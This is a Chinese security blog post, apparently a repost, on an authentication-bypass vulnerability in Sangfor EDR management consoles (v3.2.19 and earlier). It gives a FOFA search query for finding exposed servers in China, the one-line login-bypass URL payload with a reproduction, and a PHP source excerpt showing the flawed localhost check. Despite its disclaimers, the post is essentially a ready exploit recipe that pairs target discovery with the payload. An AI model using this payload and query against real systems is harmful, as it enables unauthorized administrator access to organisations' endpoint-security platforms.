【漏洞日记】某X服又出高危漏洞, EDR 任意用户登录漏洞


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

0x01 深X服EDR描述

0x02 影响范围: EDR  <= v3.2.19

请勿用作犯罪使用,网络不是法外之地,请珍惜生命,勿触犯法律... ...

你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...

0x03 FoFa 搜索相关漏洞服务器

0x04 Payload

0x05 漏洞复现

0x06 漏洞分析


      昨晚再探测一下漏洞,就半夜睡一觉起来,就看到朋友圈师傅们已又挖出了0day(流露出弟弟羡慕大佬的眼光,羡慕嫉妒恨)... ...深X服又来搞事情了....真想问,你到底得罪了谁,别人要这么搞你/哭笑不得  ,唉...

猜测是源码被大部分人下载了,被人又审计了一波,发现被人下载后,官网就停止下载的链接了,好气,好在已提前下载所有版本... ...

千万不要去猜测太多,为什么会有这种东西... ...,这就是一家产品独大,建议企业客户综合购买产品,避免一家有洞,全家裤子都被人脱掉了

0x01 深X服EDR描述

      终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。

0x02 影响范围: EDR  <= V3.2.19

构造payload绕过登录判断,直接拿到系统管理员/用户权限。

请勿用作犯罪使用,网络不是法外之地,请珍惜生命,勿触犯法律... ...

建议渗透测试业务时,千万要让客户做系统备份或数据备份,很容易出事... ...

请勿用作犯罪使用,网络不是法外之地,请珍惜生命,勿触犯法律... ...

你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...

0x03 FoFa 搜索相关漏洞服务器

Fofa:

          title="终端检测响应平台" && country="CN"

0x04 Payload

/ui/login.php?user=username

0x05 漏洞复现

输入上面的Payload只要这样一下,成功绕过

https://127.0.0.1:9443/ui/login.php?user=username

成功绕过登录后台

0x06 漏洞分析

来自:https://blog.csdn.net/z1feiyu/article/details/108116166

通过安装程序后,自己将源码拿出来看,首先看文件为ui/login.php,参数user , 此段代码逻辑出现了错误

if((isset($_SERVER["REMOTE_ADDR"]) && ("127.0.0.2" == $_SERVER["REMOTE_ADDR"] || "127.0.0.1" == $_SERVER["REMOTE_ADDR"]))
            || $docker)
        {
            //构造session
            if(isset($_GET["user"]))
            {
                $auth_value["auth_user"] = $_GET["user"];
            }
            elseif($docker)
            {
                $auth_value["auth_user"] = $username;
            }
            else
            {
                //$auth_value["auth_user"] = "SCLOUDE";
                //免密登录后,人为loginout,还是需要密码登录,url不一样
                return;
            }

在if判断中,首先判断了$_SERVER["REMOTE_ADDR"]是否存在且为127.0.0.2

然后判断了是否等于127.0.0.1 以及$docker

因为exp执行可跳转进入后台,这里判断为真,我们搜索127.0.0.0和127.0.0.1进行定位

 
 

搜索到127.0.0.1并定位到c.php , 这好像是之前命令执行RCE的文件

也就是说在这里开发不仅仅出现了变量覆盖漏洞,同时在这里默认定义了所属IP为127.0.0.1

由命令执行RCE同时触发了任意用户登陆漏洞

注:以上分析为自己的见解,漏洞触发的原因也可能为代理设置问题或是docker配置问题

参考文章:https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage


虽然我们生活在阴沟里,但依然有人仰望星空!


猜你喜欢

转载自blog.csdn.net/God_XiangYu/article/details/108115642
EDR